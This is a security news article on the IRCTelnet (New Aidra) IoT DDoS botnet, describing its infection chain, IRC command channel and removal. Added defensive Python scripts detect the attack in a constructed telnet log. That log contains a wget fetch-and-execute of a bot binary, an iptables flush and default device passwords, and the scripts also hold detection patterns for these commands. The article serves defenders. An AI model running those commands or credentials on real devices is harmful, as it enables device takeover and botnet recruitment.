
DDoS-Capable IRCTelnet IoT Botnet Emerges

A new malware family targeting Internet of Things (IoT) devices to ensnare them into distributed denial of service (DDoS) botnets has emerged.

Dubbed Linux/IRCTelnet (New Aidra), the new botnet is built on the core code of Aidra, a previously known IoT malware family designed to launch DDoS attacks. What’s more, the threat shares traits with Tsunami/Kaiten (it uses the same IRC protocol), with BASHLITE (IRCTelnet reuses its telnet scanner and infection injection code), and with Mirai (it uses Mirai’s leaked credential list).

Targeting routers and modems, the newly spotted malware carries encoded command and control (C&C) information as well as hardcoded Italian-language messages in its communication interface, a security researcher going by the name of unixfreaxjp explains. The new botnet can launch DDoS attacks using UDP floods and TCP floods, along with other techniques, over both IPv4 and IPv6.

The security researcher notes that the new piece of malware was observed infecting almost 3,500 hosts within only 5 days of first being detected. The malware uses telnet scans and brute-force attacks to infect devices, and the first infection campaign was observed on October 25.

After brute-forcing its way into a vulnerable system, the attacker executes a series of commands, including one to download and install the malware, followed by another to stop the firewall, after which the session is closed. All of these commands are executed in less than a second (not counting the time taken by the malware download itself), the security researcher says.
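The two observable stages of this infection routine, a burst of failed telnet logins followed by a sub-second command sequence that fetches a payload and stops the firewall, are exactly what a defender can look for in device or honeypot logs. The following detection script is an added example written for this article, not code from the researcher or from the malware analysis; the log format, IP addresses, command strings and thresholds are all constructed for illustration and would need to be adapted to a real telnet honeypot or device syslog format.

```python
"""Heuristics for the telnet infection pattern described in the article:
(1) a brute-force burst of failed logins from one source, and
(2) a successful login followed, within about a second, by a download
command and a firewall-stop command.  Added example, constructed data."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed telnet session log (hypothetical format: "<ts> <src> <event> [detail]").
TELNET_LOG = """\
2016-10-25T10:00:00.100 203.0.113.7 login_fail user=root pass=xc3511
2016-10-25T10:00:00.350 203.0.113.7 login_fail user=admin pass=admin
2016-10-25T10:00:00.600 203.0.113.7 login_fail user=root pass=vizxv
2016-10-25T10:00:00.900 203.0.113.7 login_ok user=root
2016-10-25T10:00:01.050 203.0.113.7 cmd wget http://198.51.100.9/bot.arm -O /tmp/.b
2016-10-25T10:00:01.200 203.0.113.7 cmd chmod +x /tmp/.b; /tmp/.b
2016-10-25T10:00:01.400 203.0.113.7 cmd iptables -F
2016-10-25T10:00:01.450 203.0.113.7 logout
2016-10-25T10:05:00.000 192.0.2.44 login_ok user=admin
2016-10-25T10:05:30.000 192.0.2.44 cmd ifconfig
2016-10-25T10:06:10.000 192.0.2.44 logout
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+)(?: (.*))?$")
# Commands typically used to fetch a payload onto a device (constructed list).
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
# Commands that flush or stop the host firewall (constructed list).
FIREWALL_RE = re.compile(r"\b(ip6?tables\s+-[FX]\b|firewall\S*\s+stop\b)")


def parse_log(text):
    """Parse the constructed log into (timestamp, src, event, detail) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that do not fit the expected format
        ts, src, event, detail = m.groups()
        events.append((datetime.fromisoformat(ts), src, event, detail or ""))
    return events


def brute_force_sources(events, threshold=3, window=timedelta(seconds=60)):
    """Return the set of sources with >= threshold failed logins inside `window`."""
    fails = defaultdict(list)
    for ts, src, event, _ in events:
        if event == "login_fail":
            fails[src].append(ts)
    flagged = set()
    for src, times in fails.items():
        times.sort()
        # Slide a window of `threshold` consecutive failures over the timeline.
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged.add(src)
                break
    return flagged


def loader_sessions(events, max_span=timedelta(seconds=2)):
    """Return sources whose session shows a download command and a
    firewall-stop command within `max_span` of a successful login.
    The article reports the real burst completing in under a second."""
    hits = []
    active = {}  # src -> state of the current logged-in session
    for ts, src, event, detail in events:
        if event == "login_ok":
            active[src] = {"start": ts, "download": False, "firewall": False}
        elif event == "cmd" and src in active:
            state = active[src]
            if DOWNLOAD_RE.search(detail):
                state["download"] = True
            if FIREWALL_RE.search(detail):
                state["firewall"] = True
            if state["download"] and state["firewall"] and ts - state["start"] <= max_span:
                hits.append(src)
                del active[src]  # report each session once
        elif event == "logout":
            active.pop(src, None)
    return hits


if __name__ == "__main__":
    evs = parse_log(TELNET_LOG)
    print("brute-force sources:", sorted(brute_force_sources(evs)))
    print("loader sessions:   ", loader_sessions(evs))
```

The brute-force check and the loader check are deliberately independent: a device that accepts a credential on the first try (as it would if the hardcoded list contains its default password) produces no failed logins, so only the second heuristic would fire. Tune the window and the command patterns to the logging source you actually have.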

The threat was observed killing previously running instances of itself and removing any earlier binaries, then downloading the latest available version. The malware can only spread from devices that are already infected, because the loader script is embedded in the malware itself, the security researcher explains (the attacker can, however, run a similar script from their own environment).

The malware is believed to target devices running operating systems compatible with Linux kernel 2.6.x (2.6.32 or above). The attack chain, the researcher says, consists of checking fork and PID beforehand, collecting the uname data of the compromised system, loading the encoded C&C data and decoding it, sending a request to the C&C server to obtain GeoIP data, reversing the GeoIP strings to form the BotID, connecting to the IRC C&C server using “d3x” if uname data isn’t available, starting the IRC connection, and listening for commands.


The malware’s code doesn’t show any persistence effort, which doesn’t come as a surprise given that it targets IoT devices, the security researcher says. The code does, however, contain the hardcoded username and password combinations.

The malware communicates with the C&C server over the IRC protocol, and a series of server-to-client commands is used to trigger its malicious functions. The researcher found around 3,400 users connected via IRC, suggesting that this is the number of infected clients so far, and also observed intense scanning for vulnerable devices.

Because of the Italian messages spotted in the botnet’s communication patterns, the security researcher says that the actor behind this piece of malware might be an Italian speaker. In fact, the researcher suggests that the actor might be “a known Italian hacker under handle: d3m0n3 or eVil (d4rk3v1l).”

The botnet shows a variety of DDoS capabilities using both IPv4 and IPv6 packets, based on the attack generator functions sendV4() and sendV6() found in the code. Because the threat has neither a persistence mechanism nor a rootkit, the infection can be removed simply by restarting the device. Users should, however, also secure the device’s telnet service in addition to rebooting it, otherwise the infection will recur.
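Because a reboot removes the running bot but not the exposure, the check that matters after restarting is whether telnet is still reachable, on IPv6 as well as IPv4 since the malware supports both. The script below is an added example, not part of the article or the researcher's analysis; it parses the output of `ss -ltn` (a real iproute2 command) for listeners on port 23, with a constructed sample of that output embedded so the logic can be exercised offline.

```python
"""Report telnet listeners from `ss -ltn` output, on both IPv4 and IPv6.
Added example with a constructed sample; the real run shells out to ss."""
import subprocess

# Constructed sample of `ss -ltn` output from a device that still exposes telnet.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       5       0.0.0.0:23           0.0.0.0:*
LISTEN  0       128     [::]:23              [::]:*
LISTEN  0       128     127.0.0.1:631        0.0.0.0:*
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
"""

TELNET_PORT = 23


def telnet_listeners(ss_output, port=TELNET_PORT):
    """Return the local addresses (IPv4 or IPv6) that listen on `port`."""
    found = []
    for line in ss_output.splitlines():
        fields = line.split()
        # Data rows begin with a socket state; the header row does not.
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        local = fields[3]
        # rsplit on the last ':' so bracketed IPv6 forms like [::]:23 parse correctly.
        addr, _, lport = local.rpartition(":")
        if lport.isdigit() and int(lport) == port:
            found.append(addr)
    return found


def is_wildcard(addr):
    """True when a listener is bound to every interface (IPv4 or IPv6)."""
    return addr in ("0.0.0.0", "*", "[::]")


def check_device(ss_output):
    """Summarise telnet exposure: (list of listeners, True if any is wildcard-bound)."""
    listeners = telnet_listeners(ss_output)
    return listeners, any(is_wildcard(a) for a in listeners)


if __name__ == "__main__":
    try:
        output = subprocess.run(["ss", "-ltn"], capture_output=True, text=True, check=True).stdout
    except (FileNotFoundError, subprocess.CalledProcessError):
        output = SAMPLE_SS_OUTPUT  # fall back to the constructed sample
    listeners, exposed = check_device(output)
    if listeners:
        print("telnet still listening on:", ", ".join(listeners))
        print("bound to all interfaces:", exposed)
    else:
        print("no telnet listener found")
```

A listener bound to `[::]` is the case most often missed when an administrator only checks IPv4; on many embedded Linux builds a single `[::]:23` socket accepts both IPv4 and IPv6 connections.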


Written By

Ionut Arghire is an international correspondent for SecurityWeek.
